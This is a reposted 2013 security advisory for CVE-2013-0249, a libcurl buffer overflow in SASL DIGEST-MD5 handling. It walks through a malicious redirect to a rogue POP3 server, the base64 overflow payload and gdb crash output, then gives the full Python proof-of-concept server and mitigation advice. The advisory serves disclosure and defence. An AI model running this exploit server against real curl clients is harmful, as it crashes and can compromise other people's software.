首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cURL Buffer Overflow Vulnerability
来源:http://evilserver.com/ 作者:Volema 发布时间:2013-02-18  
cURL buffer overflow
Wed 06 February 2013

Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.

Vendor notified, CVE-2013-0249 relased.

Attack Concept Outline

We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/

GET / HTTP/1.0
Host: evilserver.com

server answers with

HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/.

"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers

+OK POP3 server ready

curl sends

CAPA

servers answers with DIGEST-MD5 only

+OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumbydumb POP3 server

so, libcurl has to send

AUTH DIGEST-MD5

then server sends the payload

+ cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=

and overflow happens because of fixed realm buffer size

realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8

how it looks in gdb

Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()
   from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000

Original exploit: pop3d.py.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC

import socket
import base64

host = "localhost"
port = 110

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send('+OK POP3 server ready\n')
while True:
    buf = sock.recv(1024)
    print buf
    if buf.find('USER') > -1:
        sock.send('+OK\n')
    if buf.find('PASS') > -1:
        sock.send('-ERR 999\n')
    if buf.find('CAPA') > -1:
        resp =  '+OK List of capabilities follows\n'
        resp += 'SASL DIGEST-MD5\n'
        resp += 'IMPLEMENTATION dumbydumb POP3 server\n'
        resp += '.\n'
        sock.send(resp)
    if buf.find('QUIT') > -1:
        sock.send('+OK')
        break
    if buf.find('AUTH') > -1:
        realm = 'A'*128
        payload = 'realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8' % realm
        resp = '+ '+base64.b64encode(payload)+'\n'
        print resp
        sock.send(resp)
sock.close()


Mitigation

We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ActFax 5.01 RAW Server Buffer
·MS13-005 Proof Of Concept
·VMWare OVF Tools Format String
·VLC Player 2.0.4 <= Arbitrary
·Linux Kernel /dev/ptmx Key Str
·D-LINK DIR-300 / DIR-600 Remot
·Portable UPnP SDK unique_servi
·MS12-037 Internet Explorer 8 S
·FreeBSD 9.1 ftpd Remote Denial
·Windows Media Player 9.0.0 Loc
·Opera SVG Use After Free Vulne
·RealPlayer 16.0.0.282 (.html)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved